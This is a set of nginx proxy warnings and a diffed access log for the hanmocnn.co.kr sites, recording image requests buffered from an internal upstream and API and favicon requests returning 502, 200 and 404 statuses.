2026/02/18 13:19:55 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000019052 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:19:55 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000019053 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:20:01 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000019054 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:20:01 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000019055 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:52:10 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000019056 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:52:10 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000019057 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:52:11 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000019058 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:57:27 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000019059 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:58:03 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000019060 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:58:03 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000019061 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/06/0000019062 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/06/0000019063 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/06/0000019064 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/06/0000019065 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:00:50 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/06/0000019066 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/06/0000019067 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/06/0000019068 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/06/0000019069 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/07/0000019070 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/07/0000019071 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/07/0000019072 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:04:23 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/07/0000019073 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/07/0000019074 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/07/0000019075 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/07/0000019076 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:08:05 [warn] 961#961: *100612 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/07/0000019077 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 14:08:05 [warn] 961#961: *100612 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/07/0000019078 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/82/0000019823 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/82/0000019824 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/82/0000019825 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:34:00 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/82/0000019826 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:37:32 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/82/0000019827 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:37:48 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/82/0000019828 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:39:01 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/82/0000019829 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:39:01 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/83/0000019830 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/83/0000019831 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/83/0000019832 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/83/0000019833 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:41:10 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/83/0000019834 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:41:10 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/83/0000019835 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:41:11 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/83/0000019836 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/83/0000019837 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/83/0000019838 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/83/0000019839 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/84/0000019840 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:59:30 [warn] 976#976: *102635 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/84/0000019841 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:59:30 [warn] 976#976: *102635 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/84/0000019842 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/84/0000019843 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/84/0000019844 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/84/0000019845 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 21:59:31 [warn] 974#974: *102643 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/84/0000019846 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/84/0000019847 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/84/0000019848 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/84/0000019849 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/85/0000019850 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/85/0000019851 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/85/0000019852 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 22:02:02 [warn] 974#974: *102656 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/85/0000019853 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"

View File

@@ -1,798 +1,13 @@
[14/Feb/2026:22:59:23 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" [19/Feb/2026:00:43:51 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 156.146.39.184] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" "-"
[14/Feb/2026:22:59:23 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" [19/Feb/2026:01:03:36 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:22:59:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" [19/Feb/2026:01:03:36 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:22:59:49 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/" [19/Feb/2026:01:03:36 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:00:27 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" "-" [19/Feb/2026:01:03:36 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:00:28 +0000] - 502 502 - HEAD https asset.hanmocnn.co.kr "/" [Client 195.123.244.84] [Length 0] [Gzip -] [Sent-to asset.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0" "http://asset.hanmocnn.co.kr" [19/Feb/2026:01:03:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:00:30 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 128.199.182.55] [Length 154] [Gzip -] [Sent-to ] "-" "-" [19/Feb/2026:01:03:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
